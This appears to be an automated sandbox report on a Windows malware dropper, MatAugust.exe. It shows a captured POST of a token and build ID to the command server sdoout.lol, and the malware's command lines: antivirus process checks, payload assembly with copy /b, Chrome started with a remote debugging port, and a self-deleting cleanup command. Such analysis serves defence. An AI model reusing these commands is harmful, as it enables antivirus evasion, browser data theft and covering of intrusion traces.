Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	51528	116.203.14.4	443	7964	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com

Timestamp	Bytes transferred	Direction	Data
2024-12-31 15:58:09 UTC	275	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----x4wbi5xt00zmymgvk6ph User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: sdoout.lol Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-31 15:58:09 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 78 34 77 62 69 35 78 74 30 30 7a 6d 79 6d 67 76 6b 36 70 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 62 32 35 61 35 32 37 32 39 66 33 35 63 63 38 32 35 65 38 65 33 64 35 32 39 35 31 36 33 65 35 0d 0a 2d 2d 2d 2d 2d 2d 78 34 77 62 69 35 78 74 30 30 7a 6d 79 6d 67 76 6b 36 70 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 78 34 77 62 69 35 78 74 30 30 7a 6d 79 6d 67 76 6b 36 70 68 0d 0a 43 6f 6e 74 Data Ascii: ------x4wbi5xt00zmymgvk6phContent-Disposition: form-data; name="token"0b25a52729f35cc825e8e3d5295163e5------x4wbi5xt00zmymgvk6phContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------x4wbi5xt00zmymgvk6phCont
2024-12-31 15:58:10 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 15:58:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-31 15:58:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	10:57:07
Start date:	31/12/2024
Path:	C:\Users\user\Desktop\MatAugust.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\MatAugust.exe"
Imagebase:	0x400000
File size:	1'171'058 bytes
MD5 hash:	39798D9BFF4607F95DF260FF89C564C0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	10:57:08
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c move Expertise Expertise.cmd & Expertise.cmd
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:57:08
Start date:	31/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:57:10
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x630000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:57:10
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "opssvc wrsa"
Imagebase:	0xf80000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	10:57:11
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x630000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	10:57:11
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:	0xf80000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:57:11
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 164676
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	10:57:11
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\extrac32.exe
Wow64 process (32bit):	true
Commandline:	extrac32 /Y /E Grab
Imagebase:	0x110000
File size:	29'184 bytes
MD5 hash:	9472AAB6390E4F1431BAA912FCFF9707
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	10:57:12
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "slovenia" Contractors
Imagebase:	0xf80000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	10:57:12
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b 164676\Stopped.com + Zero + Refugees + Severe + Removal + Differential + Mph + Increasingly + Born + Convinced + Passenger 164676\Stopped.com
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	10:57:12
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Furnished + ..\Relative + ..\Calgary + ..\Pour + ..\Halfcom + ..\Nj + ..\Capitol + ..\Firewire + ..\Trees h
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	10:57:13
Start date:	31/12/2024
Path:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
Wow64 process (32bit):	true
Commandline:	Stopped.com h
Imagebase:	0x720000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	10:57:13
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0xd10000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	10:57:39
Start date:	31/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	10:57:40
Start date:	31/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2428 --field-trial-handle=2272,i,12603068137312360975,10609379310723009523,262144 /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	10:58:10
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com" & rd /s /q "C:\ProgramData\wlxlf" & exit
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	10:58:10
Start date:	31/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	10:58:10
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 10
Imagebase:	0xb80000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	18.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.7%
Total number of Nodes:	1525
Total number of Limit Nodes:	33

Executed Functions

Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040512F
GetDlgItem.USER32(?,000003EE), ref: 0040513E
GetClientRect.USER32(?,?), ref: 00405196
GetSystemMetrics.USER32(00000015), ref: 0040519E
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
ShowWindow.USER32(?,00000008), ref: 0040523A
GetDlgItem.USER32(?,000003EC), ref: 0040525B
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
GetDlgItem.USER32(?,000003F8), ref: 0040514D

Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

GetDlgItem.USER32(?,000003EC), ref: 004052AB
CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
CloseHandle.KERNELBASE(00000000), ref: 004052C0
ShowWindow.USER32(00000000), ref: 004052E7
ShowWindow.USER32(?,00000008), ref: 004052EC
ShowWindow.USER32(00000008), ref: 00405333
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
CreatePopupMenu.USER32 ref: 00405376
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
GetWindowRect.USER32(?,?), ref: 0040539E
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
OpenClipboard.USER32(00000000), ref: 0040540B
EmptyClipboard.USER32 ref: 00405411
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
GlobalLock.KERNEL32(00000000), ref: 00405427
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
GlobalUnlock.KERNEL32(00000000), ref: 0040545D
SetClipboardData.USER32(0000000D,00000000), ref: 00405468
CloseClipboard.USER32 ref: 0040546E

Strings

New install of "%s" to "%s", xrefs: 00405182
@rD, xrefs: 004053D7
{, xrefs: 00405352

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: @rD$New install of "%s" to "%s"${
API String ID: 2110491804-2409696222
Opcode ID: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
Opcode Fuzzy Hash: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038A2
SetErrorMode.KERNELBASE(00008001), ref: 004038AD
OleInitialize.OLE32(00000000), ref: 004038B4

Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327

SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
CoUninitialize.COMBASE(?), ref: 00403AD1
ExitProcess.KERNEL32 ref: 00403AF1
lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40

Strings

Error launching installer, xrefs: 00403A7D
NSIS Error, xrefs: 004038E2
SeShutdownPrivilege, xrefs: 00403C16
~nsu.tmp, xrefs: 00403AF7
/D=, xrefs: 004039A6
1C, xrefs: 00403B56
_?=, xrefs: 00403A64
\Temp, xrefs: 00403A1B
NCRC, xrefs: 0040397C

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
API String ID: 2435955865-239407132
Opcode ID: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
Opcode Fuzzy Hash: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47

Strings

@%F, xrefs: 0040682C
@%F, xrefs: 00406A53
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406926
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004069DF

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3581403547-784952888
Opcode ID: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
Opcode Fuzzy Hash: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D

Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86

Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
GetProcAddress.KERNEL32(00000000), ref: 00406327

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC

Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
FindClose.KERNEL32(00000000), ref: 004062EC

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
ShowWindow.USER32(?), ref: 004054D2
DestroyWindow.USER32 ref: 004054E6
SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
GetDlgItem.USER32(?,?), ref: 00405523
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
IsWindowEnabled.USER32(00000000), ref: 0040553E
GetDlgItem.USER32(?,00000001), ref: 004055ED
